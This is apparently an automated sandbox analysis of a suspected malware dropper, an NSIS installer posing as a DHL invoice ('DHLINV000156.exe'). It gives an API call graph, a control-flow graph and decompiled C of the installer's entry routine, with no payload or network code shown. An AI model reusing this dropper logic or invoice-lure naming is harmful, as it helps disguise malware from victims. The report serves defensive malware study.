4865->4864 4899 4031ed SetFilePointer 4865->4899 4868 403047 4867->4868 4869 403177 4868->4869 4870 403059 GetTickCount 4868->4870 4872 403161 4868->4872 4871 40317b 4869->4871 4876 403193 4869->4876 4880 40306c 4870->4880 4873 4031d7 ReadFile 4871->4873 4872->4759 4873->4872 4874 4031d7 ReadFile 4874->4876 4875 4031d7 ReadFile 4875->4880 4876->4872 4876->4874 4877 405c1a WriteFile 4876->4877 4877->4876 4879 4030d2 GetTickCount 4879->4880 4880->4872 4880->4875 4880->4879 4881 4030fb MulDiv wsprintfA 4880->4881 4883 405c1a WriteFile 4880->4883 4892 4064b7 4880->4892 4882 405101 24 API calls 4881->4882 4882->4880 4883->4880 4885 405beb ReadFile 4884->4885 4886 4031ea 4885->4886 4886->4761 4887->4753 4889 4063cb PeekMessageA 4888->4889 4890 4063c1 DispatchMessageA 4889->4890 4891 402d8f 4889->4891 4890->4889 4891->4745 4893 4064dc 4892->4893 4894 4064e4 4892->4894 4893->4880 4894->4893 4895 406574 GlobalAlloc 4894->4895 4896 40656b GlobalFree 4894->4896 4897 4065e2 GlobalFree 4894->4897 4898 4065eb GlobalAlloc 4894->4898 4895->4893 4895->4894 4896->4895 4897->4898 4898->4893 4898->4894 4899->4864 4901 403ad0 4900->4901 4917 405f38 wsprintfA 4901->4917 4903 403b41 4904 403b75 18 API calls 4903->4904 4906 403b46 4904->4906 4905 40387c 4905->4775 4906->4905 4907 405ffc 17 API calls 4906->4907 4907->4906 4909 4040b4 SendMessageA 4908->4909 4910 4051f6 4909->4910 4913 40521d 4910->4913 4914 401389 2 API calls 4910->4914 4911 4040b4 SendMessageA 4912 40522f OleUninitialize 4911->4912 4912->4806 4913->4911 4914->4910 4915->4772 4916->4777 4917->4903 4919 403770 4918->4919 4920 40373a 4919->4920 4921 403775 FreeLibrary GlobalFree 4919->4921 4920->4826 4921->4920 4921->4921 5822 4037b5 5823 4037c0 5822->5823 5824 4037c4 5823->5824 5825 4037c7 GlobalAlloc 5823->5825 5825->5824 5826 4014b7 5827 4014bd 5826->5827 5828 401389 2 API calls 5827->5828 5829 4014c5 5828->5829 4927 402138 4928 402b2c 17 API calls 4927->4928 4929 40213f 4928->4929 4930 402b2c 17 API calls 4929->4930 4931 402149 4930->4931 4932 402b2c 17 API calls 4931->4932 4933 402153 4932->4933 4934 402b2c 17 API calls 4933->4934 4935 40215d 4934->4935 4936 402b2c 17 API calls 4935->4936 4937 402167 4936->4937 4938 4021a9 CoCreateInstance 4937->4938 4939 402b2c 17 API calls 4937->4939 4942 4021c8 4938->4942 4944 402273 4938->4944 4939->4938 4940 401423 24 API calls 4941 4022a9 4940->4941 4943 402253 MultiByteToWideChar 4942->4943 4942->4944 4943->4944 4944->4940 4944->4941 4986 4015bb 4987 402b2c 17 API calls 4986->4987 4988 4015c2 4987->4988 4989 405a0b 4 API calls 4988->4989 5002 4015ca 4989->5002 4990 401624 4992 401652 4990->4992 4993 401629 4990->4993 4991 40599d CharNextA 4991->5002 4995 401423 24 API calls 4992->4995 4994 401423 24 API calls 4993->4994 4996 401630 4994->4996 5001 40164a 4995->5001 5005 405fda lstrcpynA 4996->5005 4997 405644 2 API calls 4997->5002 4999 405661 5 API calls 4999->5002 5000 40163b SetCurrentDirectoryA 5000->5001 5002->4990 5002->4991 5002->4997 5002->4999 5003 40160c GetFileAttributesA 5002->5003 5004 4055c7 4 API calls 5002->5004 5003->5002 5004->5002 5005->5000 5830 40273b 5831 402741 5830->5831 5832 402745 FindNextFileA 5831->5832 5834 402757 5831->5834 5833 402796 5832->5833 5832->5834 5836 405fda lstrcpynA 5833->5836 5836->5834 5837 4016bb 5838 402b2c 17 API calls 5837->5838 5839 4016c1 GetFullPathNameA 5838->5839 5840 4016d8 5839->5840 5846 4016f9 5839->5846 5843 4062dd 2 API calls 5840->5843 5840->5846 5841 4029b8 5842 40170d GetShortPathNameA 5842->5841 5844 4016e9 5843->5844 5844->5846 5847 405fda lstrcpynA 5844->5847 5846->5841 5846->5842 5847->5846 5006 40243d 5007 402b2c 17 API calls 5006->5007 5008 40244f 5007->5008 5009 402b2c 17 API calls 5008->5009 5010 402459 5009->5010 5023 402bbc 5010->5023 5013 4029b8 5014 40248e 5015 40249a 5014->5015 5017 402b0a 17 API calls 5014->5017 5018 4024b9 RegSetValueExA 5015->5018 5020 402ffb 35 API calls 5015->5020 5016 402b2c 17 API calls 5019 402487 lstrlenA 5016->5019 5017->5015 5021 4024cf RegCloseKey 5018->5021 5019->5014 5020->5018 5021->5013 5024 402bd7 5023->5024 5027 405e8e 5024->5027 5028 405e9d 5027->5028 5029 402469 5028->5029 5030 405ea8 RegCreateKeyExA 5028->5030 5029->5013 5029->5014 5029->5016 5030->5029 5041 40523f 5042 405261 GetDlgItem GetDlgItem GetDlgItem 5041->5042 5043 4053ea 5041->5043 5087 40409d SendMessageA 5042->5087 5045 4053f2 GetDlgItem CreateThread FindCloseChangeNotification 5043->5045 5046 40541a 5043->5046 5045->5046 5090 4051d3 5 API calls 5045->5090 5047 405448 5046->5047 5049 405430 ShowWindow ShowWindow 5046->5049 5050 405469 5046->5050 5051 405450 5047->5051 5052 4054a3 5047->5052 5048 4052d1 5053 4052d8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5048->5053 5089 40409d SendMessageA 5049->5089 5057 4040cf 8 API calls 5050->5057 5055 405458 5051->5055 5056 40547c ShowWindow 5051->5056 5052->5050 5060 4054b0 SendMessageA 5052->5060 5058 405346 5053->5058 5059 40532a SendMessageA SendMessageA 5053->5059 5061 404041 SendMessageA 5055->5061 5063 40549c 5056->5063 5064 40548e 5056->5064 5062 405475 5057->5062 5065 405359 5058->5065 5066 40534b SendMessageA 5058->5066 5059->5058 5060->5062 5067 4054c9 CreatePopupMenu 5060->5067 5061->5050 5069 404041 SendMessageA 5063->5069 5068 405101 24 API calls 5064->5068 5071 404068 18 API calls 5065->5071 5066->5065 5070 405ffc 17 API calls 5067->5070 5068->5063 5069->5052 5072 4054d9 AppendMenuA 5070->5072 5073 405369 5071->5073 5074 4054f7 GetWindowRect 5072->5074 5075 40550a TrackPopupMenu 5072->5075 5076 405372 ShowWindow 5073->5076 5077 4053a6 GetDlgItem SendMessageA 5073->5077 5074->5075 5075->5062 5078 405526 5075->5078 5079 405395 5076->5079 5080 405388 ShowWindow 5076->5080 5077->5062 5081 4053cd SendMessageA SendMessageA 5077->5081 5082 405545 SendMessageA 5078->5082 5088 40409d SendMessageA 5079->5088 5080->5079 5081->5062 5082->5082 5083 405562 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5082->5083 5085 405584 SendMessageA 5083->5085 5085->5085 5086 4055a6 GlobalUnlock SetClipboardData CloseClipboard 5085->5086 5086->5062 5087->5048 5088->5077 5089->5047 5848 401b3f 5849 402b2c 17 API calls 5848->5849 5850 401b46 5849->5850 5851 402b0a 17 API calls 5850->5851 5852 401b4f wsprintfA 5851->5852 5853 4029b8 5852->5853

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 403235-403274 SetErrorMode GetVersion 1 403276-40327e call 406372 0->1 2 403287 0->2 1->2 7 403280 1->7 4 40328c-40329f call 406304 lstrlenA 2->4 9 4032a1-4032bd call 406372 * 3 4->9 7->2 16 4032ce-40332c #17 OleInitialize SHGetFileInfoA call 405fda GetCommandLineA call 405fda 9->16 17 4032bf-4032c5 9->17 24 403338-40334d call 40599d CharNextA 16->24 25 40332e-403333 16->25 17->16 21 4032c7 17->21 21->16 28 403412-403416 24->28 25->24 29 403352-403355 28->29 30 40341c 28->30 31 403357-40335b 29->31 32 40335d-403365 29->32 33 40342f-403449 GetTempPathA call 403204 30->33 31->31 31->32 34 403367-403368 32->34 35 40336d-403370 32->35 42 4034a1-4034bb DeleteFileA call 402dc4 33->42 43 40344b-403469 GetWindowsDirectoryA lstrcatA call 403204 33->43 34->35 37 403402-40340f call 40599d 35->37 38 403376-40337a 35->38 37->28 53 403411 37->53 40 403392-4033bf 38->40 41 40337c-403382 38->41 49 4033c1-4033c7 40->49 50 4033d2-403400 40->50 47 403384-403386 41->47 48 403388 41->48 58 4034c1-4034c7 42->58 59 40354f-40355f call 40371d OleUninitialize 42->59 43->42 61 40346b-40349b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403204 43->61 47->40 47->48 48->40 54 4033c9-4033cb 49->54 55 4033cd 49->55 50->37 57 40341e-40342a call 405fda 50->57 53->28 54->50 54->55 55->50 57->33 62 4034c9-4034d4 call 40599d 58->62 63 40353f-403546 call 4037f7 58->63 72 403683-403689 59->72 73 403565-403575 call 4056f6 ExitProcess 59->73 61->42 61->59 74 4034d6-4034ff 62->74 75 40350a-403514 62->75 70 40354b 63->70 70->59 77 403705-40370d 72->77 78 40368b-4036a4 GetCurrentProcess OpenProcessToken 72->78 79 403501-403503 74->79 82 403516-403523 call 405a60 75->82 83 40357b-40358f call 405661 lstrcatA 75->83 80 403713-403717 ExitProcess 77->80 81 40370f 77->81 85 4036d6-4036e4 call 406372 78->85 86 4036a6-4036d0 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 88 403505-403508 79->88 81->80 82->59 96 403525-40353b call 405fda * 2 82->96 97 403591-403597 lstrcatA 83->97 98 40359c-4035b6 lstrcatA lstrcmpiA 83->98 94 4036f2-4036fc ExitWindowsEx 85->94 95 4036e6-4036f0 85->95 86->85 88->75 88->79 94->77 100 4036fe-403700 call 40140b 94->100 95->94 95->100 96->63 97->98 98->59 99 4035b8-4035bb 98->99 102 4035c4 call 405644 99->102 103 4035bd-4035c2 call 4055c7 99->103 100->77 112 4035c9-4035d6 SetCurrentDirectoryA 102->112 103->112 113 4035e3-40360b call 405fda 112->113 114 4035d8-4035de call 405fda 112->114 118 403611-40362d call 405ffc DeleteFileA 113->118 114->113 121 40366e-403675 118->121 122 40362f-40363f CopyFileA 118->122 121->118 124 403677-40367e call 405db9 121->124 122->121 123 403641-403661 call 405db9 call 405ffc call 405679 122->123 123->121 133 403663-40366a CloseHandle 123->133 124->59 133->121
                                        C-Code - Quality: 86%
                                        			_entry_() {
                                        				signed int _t42;
                                        				intOrPtr* _t47;
                                        				CHAR* _t51;
                                        				char* _t53;
                                        				CHAR* _t55;
                                        				void* _t59;
                                        				intOrPtr _t61;
                                        				int _t63;
                                        				int _t66;
                                        				signed int _t67;
                                        				int _t68;
                                        				signed int _t70;
                                        				void* _t94;
                                        				signed int _t110;
                                        				void* _t113;
                                        				void* _t118;
                                        				intOrPtr* _t119;
                                        				char _t122;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				int _t150;
                                        				void* _t151;
                                        				intOrPtr* _t153;
                                        				CHAR* _t156;
                                        				CHAR* _t157;
                                        				void* _t159;
                                        				char* _t160;
                                        				void* _t163;
                                        				void* _t164;
                                        				char _t189;
                                        
                                        				 *(_t164 + 0x18) = 0;
                                        				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                        				 *(_t164 + 0x20) = 0;
                                        				 *(_t164 + 0x14) = 0x20;
                                        				SetErrorMode(0x8001); // executed
                                        				_t42 = GetVersion() & 0xbfffffff;
                                        				 *0x42370c = _t42;
                                        				if(_t42 != 6) {
                                        					_t119 = E00406372(0);
                                        					if(_t119 != 0) {
                                        						 *_t119(0xc00);
                                        					}
                                        				}
                                        				_t156 = "UXTHEME";
                                        				do {
                                        					E00406304(_t156); // executed
                                        					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                        				} while ( *_t156 != 0);
                                        				E00406372(0xa);
                                        				 *0x423704 = E00406372(8);
                                        				_t47 = E00406372(6);
                                        				if(_t47 != 0) {
                                        					_t47 =  *_t47(0x1e);
                                        					if(_t47 != 0) {
                                        						 *0x42370f =  *0x42370f | 0x00000040;
                                        					}
                                        				}
                                        				__imp__#17(_t159);
                                        				__imp__OleInitialize(0); // executed
                                        				 *0x4237d8 = _t47;
                                        				SHGetFileInfoA(0x41ecc8, 0, _t164 + 0x38, 0x160, 0); // executed
                                        				E00405FDA(0x422f00, "NSIS Error");
                                        				_t51 = GetCommandLineA();
                                        				_t160 = "\"C:\\Users\\hardz\\Desktop\\DHLINV000156.exe\"";
                                        				E00405FDA(_t160, _t51);
                                        				 *0x423700 = 0x400000;
                                        				_t53 = _t160;
                                        				if("\"C:\\Users\\hardz\\Desktop\\DHLINV000156.exe\"" == 0x22) {
                                        					 *(_t164 + 0x14) = 0x22;
                                        					_t53 =  &M00429001;
                                        				}
                                        				_t55 = CharNextA(E0040599D(_t53,  *(_t164 + 0x14)));
                                        				 *(_t164 + 0x1c) = _t55;
                                        				while(1) {
                                        					_t122 =  *_t55;
                                        					_t172 = _t122;
                                        					if(_t122 == 0) {
                                        						break;
                                        					}
                                        					__eflags = _t122 - 0x20;
                                        					if(_t122 != 0x20) {
                                        						L13:
                                        						__eflags =  *_t55 - 0x22;
                                        						 *(_t164 + 0x14) = 0x20;
                                        						if( *_t55 == 0x22) {
                                        							_t55 =  &(_t55[1]);
                                        							__eflags = _t55;
                                        							 *(_t164 + 0x14) = 0x22;
                                        						}
                                        						__eflags =  *_t55 - 0x2f;
                                        						if( *_t55 != 0x2f) {
                                        							L25:
                                        							_t55 = E0040599D(_t55,  *(_t164 + 0x14));
                                        							__eflags =  *_t55 - 0x22;
                                        							if(__eflags == 0) {
                                        								_t55 =  &(_t55[1]);
                                        								__eflags = _t55;
                                        							}
                                        							continue;
                                        						} else {
                                        							_t55 =  &(_t55[1]);
                                        							__eflags =  *_t55 - 0x53;
                                        							if( *_t55 != 0x53) {
                                        								L20:
                                        								__eflags =  *_t55 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
                                        								if( *_t55 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
                                        									L24:
                                        									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
                                        									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
                                        										 *((char*)(_t55 - 2)) = 0;
                                        										__eflags =  &(_t55[2]);
                                        										E00405FDA("C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto",  &(_t55[2]));
                                        										L30:
                                        										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                        										GetTempPathA(0x400, _t157);
                                        										_t59 = E00403204(_t172);
                                        										_t173 = _t59;
                                        										if(_t59 != 0) {
                                        											L33:
                                        											DeleteFileA("1033"); // executed
                                        											_t61 = E00402DC4(_t175,  *(_t164 + 0x20)); // executed
                                        											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                        											if(_t61 != 0) {
                                        												L43:
                                        												E0040371D();
                                        												__imp__OleUninitialize();
                                        												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                        												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                        													__eflags =  *0x4237b4;
                                        													if( *0x4237b4 == 0) {
                                        														L67:
                                        														_t63 =  *0x4237cc;
                                        														__eflags = _t63 - 0xffffffff;
                                        														if(_t63 != 0xffffffff) {
                                        															 *(_t164 + 0x14) = _t63;
                                        														}
                                        														ExitProcess( *(_t164 + 0x14));
                                        													}
                                        													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                        													__eflags = _t66;
                                        													_t150 = 2;
                                        													if(_t66 != 0) {
                                        														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                        														 *(_t164 + 0x38) = 1;
                                        														 *(_t164 + 0x44) = _t150;
                                        														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                        													}
                                        													_t67 = E00406372(4);
                                        													__eflags = _t67;
                                        													if(_t67 == 0) {
                                        														L65:
                                        														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                        														__eflags = _t68;
                                        														if(_t68 != 0) {
                                        															goto L67;
                                        														}
                                        														goto L66;
                                        													} else {
                                        														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                        														__eflags = _t70;
                                        														if(_t70 == 0) {
                                        															L66:
                                        															E0040140B(9);
                                        															goto L67;
                                        														}
                                        														goto L65;
                                        													}
                                        												}
                                        												E004056F6( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                        												ExitProcess(2);
                                        											}
                                        											if( *0x423720 == 0) {
                                        												L42:
                                        												 *0x4237cc =  *0x4237cc | 0xffffffff;
                                        												 *(_t164 + 0x18) = E004037F7( *0x4237cc);
                                        												goto L43;
                                        											}
                                        											_t153 = E0040599D(_t160, 0);
                                        											if(_t153 < _t160) {
                                        												L39:
                                        												_t182 = _t153 - _t160;
                                        												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                        												if(_t153 < _t160) {
                                        													_t151 = E00405661(_t185);
                                        													lstrcatA(_t157, "~nsu");
                                        													if(_t151 != 0) {
                                        														lstrcatA(_t157, "A");
                                        													}
                                        													lstrcatA(_t157, ".tmp");
                                        													_t162 = "C:\\Users\\hardz\\Desktop";
                                        													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
                                        														_push(_t157);
                                        														if(_t151 == 0) {
                                        															E00405644();
                                        														} else {
                                        															E004055C7();
                                        														}
                                        														SetCurrentDirectoryA(_t157);
                                        														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto"; // 0x43
                                        														if(_t189 == 0) {
                                        															E00405FDA("C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto", _t162);
                                        														}
                                        														E00405FDA(0x424000,  *(_t164 + 0x1c));
                                        														_t137 = "A";
                                        														_t163 = 0x1a;
                                        														 *0x424400 = "A";
                                        														do {
                                        															E00405FFC(0, 0x41e8c8, _t157, 0x41e8c8,  *((intOrPtr*)( *0x423714 + 0x120)));
                                        															DeleteFileA(0x41e8c8);
                                        															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\DHLINV000156.exe", 0x41e8c8, 1) != 0) {
                                        																E00405DB9(_t137, 0x41e8c8, 0);
                                        																E00405FFC(0, 0x41e8c8, _t157, 0x41e8c8,  *((intOrPtr*)( *0x423714 + 0x124)));
                                        																_t94 = E00405679(0x41e8c8);
                                        																if(_t94 != 0) {
                                        																	CloseHandle(_t94);
                                        																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                        																}
                                        															}
                                        															 *0x424400 =  *0x424400 + 1;
                                        															_t163 = _t163 - 1;
                                        														} while (_t163 != 0);
                                        														E00405DB9(_t137, _t157, 0);
                                        													}
                                        													goto L43;
                                        												}
                                        												 *_t153 = 0;
                                        												_t154 = _t153 + 4;
                                        												if(E00405A60(_t182, _t153 + 4) == 0) {
                                        													goto L43;
                                        												}
                                        												E00405FDA("C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto", _t154);
                                        												E00405FDA("C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto\\Styringsmidlernes\\Pinkfishes109\\Supersensitizations172\\Smaskforvirrede", _t154);
                                        												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                        												goto L42;
                                        											}
                                        											_t110 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
                                        											while( *_t153 != _t110) {
                                        												_t153 = _t153 - 1;
                                        												if(_t153 >= _t160) {
                                        													continue;
                                        												}
                                        												goto L39;
                                        											}
                                        											goto L39;
                                        										}
                                        										GetWindowsDirectoryA(_t157, 0x3fb);
                                        										lstrcatA(_t157, "\\Temp");
                                        										_t113 = E00403204(_t173);
                                        										_t174 = _t113;
                                        										if(_t113 != 0) {
                                        											goto L33;
                                        										}
                                        										GetTempPathA(0x3fc, _t157);
                                        										lstrcatA(_t157, "Low");
                                        										SetEnvironmentVariableA("TEMP", _t157);
                                        										SetEnvironmentVariableA("TMP", _t157);
                                        										_t118 = E00403204(_t174);
                                        										_t175 = _t118;
                                        										if(_t118 == 0) {
                                        											goto L43;
                                        										}
                                        										goto L33;
                                        									}
                                        									goto L25;
                                        								}
                                        								_t141 = _t55[4];
                                        								__eflags = _t141 - 0x20;
                                        								if(_t141 == 0x20) {
                                        									L23:
                                        									_t15 = _t164 + 0x20;
                                        									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                        									__eflags =  *_t15;
                                        									goto L24;
                                        								}
                                        								__eflags = _t141;
                                        								if(_t141 != 0) {
                                        									goto L24;
                                        								}
                                        								goto L23;
                                        							}
                                        							_t142 = _t55[1];
                                        							__eflags = _t142 - 0x20;
                                        							if(_t142 == 0x20) {
                                        								L19:
                                        								 *0x4237c0 = 1;
                                        								goto L20;
                                        							}
                                        							__eflags = _t142;
                                        							if(_t142 != 0) {
                                        								goto L20;
                                        							}
                                        							goto L19;
                                        						}
                                        					} else {
                                        						goto L12;
                                        					}
                                        					do {
                                        						L12:
                                        						_t55 =  &(_t55[1]);
                                        						__eflags =  *_t55 - 0x20;
                                        					} while ( *_t55 == 0x20);
                                        					goto L13;
                                        				}
                                        				goto L30;
                                        			}

































                                        0x00403245
                                        0x00403249
                                        0x00403251
                                        0x00403255
                                        0x0040325a
                                        0x00403266
                                        0x0040326f
                                        0x00403274
                                        0x00403277
                                        0x0040327e
                                        0x00403285
                                        0x00403285
                                        0x0040327e
                                        0x00403287
                                        0x0040328c
                                        0x0040328d
                                        0x00403299
                                        0x0040329d
                                        0x004032a3
                                        0x004032b1
                                        0x004032b6
                                        0x004032bd
                                        0x004032c1
                                        0x004032c5
                                        0x004032c7
                                        0x004032c7
                                        0x004032c5
                                        0x004032cf
                                        0x004032d6
                                        0x004032dc
                                        0x004032f2
                                        0x00403302
                                        0x00403307
                                        0x0040330d
                                        0x00403314
                                        0x00403320
                                        0x0040332a
                                        0x0040332c
                                        0x0040332e
                                        0x00403333
                                        0x00403333
                                        0x00403343
                                        0x00403349
                                        0x00403412
                                        0x00403412
                                        0x00403414
                                        0x00403416
                                        0x00000000
                                        0x00000000
                                        0x00403352
                                        0x00403355
                                        0x0040335d
                                        0x0040335d
                                        0x00403360
                                        0x00403365
                                        0x00403367
                                        0x00403367
                                        0x00403368
                                        0x00403368
                                        0x0040336d
                                        0x00403370
                                        0x00403402
                                        0x00403407
                                        0x0040340c
                                        0x0040340f
                                        0x00403411
                                        0x00403411
                                        0x00403411
                                        0x00000000
                                        0x00403376
                                        0x00403376
                                        0x00403377
                                        0x0040337a
                                        0x00403392
                                        0x004033bd
                                        0x004033bf
                                        0x004033d2
                                        0x004033fd
                                        0x00403400
                                        0x0040341e
                                        0x00403421
                                        0x0040342a
                                        0x0040342f
                                        0x00403435
                                        0x00403440
                                        0x00403442
                                        0x00403447
                                        0x00403449
                                        0x004034a1
                                        0x004034a6
                                        0x004034b0
                                        0x004034b7
                                        0x004034bb
                                        0x0040354f
                                        0x0040354f
                                        0x00403554
                                        0x0040355a
                                        0x0040355f
                                        0x00403683
                                        0x00403689
                                        0x00403705
                                        0x00403705
                                        0x0040370a
                                        0x0040370d
                                        0x0040370f
                                        0x0040370f
                                        0x00403717
                                        0x00403717
                                        0x00403699
                                        0x004036a1
                                        0x004036a3
                                        0x004036a4
                                        0x004036b1
                                        0x004036c4
                                        0x004036cc
                                        0x004036d0
                                        0x004036d0
                                        0x004036d8
                                        0x004036dd
                                        0x004036e4
                                        0x004036f2
                                        0x004036f4
                                        0x004036fa
                                        0x004036fc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004036e6
                                        0x004036ec
                                        0x004036ee
                                        0x004036f0
                                        0x004036fe
                                        0x00403700
                                        0x00000000
                                        0x00403700
                                        0x00000000
                                        0x004036f0
                                        0x004036e4
                                        0x0040356e
                                        0x00403575
                                        0x00403575
                                        0x004034c7
                                        0x0040353f
                                        0x0040353f
                                        0x0040354b
                                        0x00000000
                                        0x0040354b
                                        0x004034d0
                                        0x004034d4
                                        0x0040350a
                                        0x0040350a
                                        0x0040350c
                                        0x00403514
                                        0x00403586
                                        0x00403588
                                        0x0040358f
                                        0x00403597
                                        0x00403597
                                        0x004035a2
                                        0x004035a7
                                        0x004035b6
                                        0x004035ba
                                        0x004035bb
                                        0x004035c4
                                        0x004035bd
                                        0x004035bd
                                        0x004035bd
                                        0x004035ca
                                        0x004035d0
                                        0x004035d6
                                        0x004035de
                                        0x004035de
                                        0x004035ec
                                        0x004035f1
                                        0x00403603
                                        0x0040360b
                                        0x00403611
                                        0x0040361d
                                        0x00403623
                                        0x0040362d
                                        0x00403643
                                        0x00403654
                                        0x0040365a
                                        0x00403661
                                        0x00403664
                                        0x0040366a
                                        0x0040366a
                                        0x00403661
                                        0x0040366e
                                        0x00403674
                                        0x00403674
                                        0x00403679
                                        0x00403679
                                        0x00000000
                                        0x004035b6
                                        0x00403516
                                        0x00403518
                                        0x00403523
                                        0x00000000
                                        0x00000000
                                        0x0040352b
                                        0x00403536
                                        0x0040353b
                                        0x00000000
                                        0x0040353b
                                        0x004034ff
                                        0x00403501
                                        0x00403505
                                        0x00403508
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403508
                                        0x00000000
                                        0x00403501
                                        0x00403451
                                        0x0040345d
                                        0x00403462
                                        0x00403467
                                        0x00403469
                                        0x00000000
                                        0x00000000
                                        0x00403471
                                        0x00403479
                                        0x0040348a
                                        0x00403492
                                        0x00403494
                                        0x00403499
                                        0x0040349b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040349b
                                        0x00000000
                                        0x00403400
                                        0x004033c1
                                        0x004033c4
                                        0x004033c7
                                        0x004033cd
                                        0x004033cd
                                        0x004033cd
                                        0x004033cd
                                        0x00000000
                                        0x004033cd
                                        0x004033c9
                                        0x004033cb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004033cb
                                        0x0040337c
                                        0x0040337f
                                        0x00403382
                                        0x00403388
                                        0x00403388
                                        0x00000000
                                        0x00403388
                                        0x00403384
                                        0x00403386
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403386
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403357
                                        0x00403357
                                        0x00403357
                                        0x00403358
                                        0x00403358
                                        0x00000000
                                        0x00403357
                                        0x00000000

                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 0040325A
                                        • GetVersion.KERNEL32 ref: 00403260
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032CF
                                        • OleInitialize.OLE32(00000000), ref: 004032D6
                                        • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032F2
                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00403307
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DHLINV000156.exe",00000020,"C:\Users\user\Desktop\DHLINV000156.exe",00000000,?,00000006,00000008,0000000A), ref: 00403343
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403440
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403451
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040345D
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403471
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403479
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348A
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403492
                                        • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034A6
                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                          • Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto,1033,Sepad149: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Sepad149: Installing,00000000,00000002,74D0FA90), ref: 004038E7
                                          • Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto,1033,Sepad149: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Sepad149: Installing,00000000), ref: 004038FA
                                          • Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                          • Part of subcall function 004037F7: LoadImageA.USER32 ref: 0040394E
                                          • Part of subcall function 004037F7: RegisterClassA.USER32 ref: 0040398B
                                          • Part of subcall function 0040371D: CloseHandle.KERNEL32(000002A8,00403554,?,?,00000006,00000008,0000000A), ref: 00403728
